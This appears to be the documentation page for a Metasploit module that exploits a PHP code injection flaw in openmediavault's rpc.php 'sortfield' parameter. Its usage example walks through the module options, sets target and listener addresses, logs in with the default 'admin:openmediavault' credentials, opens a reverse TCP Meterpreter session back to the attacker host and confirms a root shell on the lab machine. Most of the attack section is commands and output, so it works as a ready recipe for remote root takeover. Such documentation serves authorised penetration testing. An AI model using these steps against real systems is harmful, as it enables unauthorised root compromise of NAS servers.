This module exploits an authenticated PHP code injection vulnerability found in openmediavault before 4.1.36 and 5.x before 5.5.12 inclusive, in the "sortfield" POST parameter of the "rpc.php" page, because json_encode_safe is not used in config/databasebackend.inc. Successful exploitation allows arbitrary command execution on the underlying operating system as root.

### Usage Example

```
msf6 > use exploit/unix/webapp/openmediavault_rpc_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > show options

Module options (exploit/unix/webapp/openmediavault_rpc_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  openmediavault   yes       Password to login with
   HttpUsername  admin            yes       User to login with
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80               yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT       8080             yes       The local port to listen on.
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                        no        The URI to use for this exploit (default is random)
   VHOST                          no        HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (Linux Dropper)

msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set rhosts 192.168.56.108
rhosts => 192.168.56.108
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set lhost 192.168.56.105
lhost => 192.168.56.105
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > exploit

[*] Started reverse TCP handler on 192.168.56.105:4444
[*] 192.168.56.108:80 - Authenticating using "admin:openmediavault" credentials...
[+] 192.168.56.108:80 - Authenticated successfully.
[+] 192.168.56.108:80 - OpenMediaVault version 5.5.11 identified.
[*] 192.168.56.108:80 - Sending payload (150 bytes)...
[*] Sending stage (976712 bytes) to 192.168.56.108
[*] Meterpreter session 1 opened (192.168.56.105:4444 -> 192.168.56.108:38508) at 2020-10-07 01:16:01 -0400
[*] Command Stager progress - 100.00% done (799/799 bytes)

meterpreter > sysinfo
Computer     : 192.168.56.108
OS           : Debian 10.5 (Linux 5.7.0-0.bpo.2-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > shell
Process 1499 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
```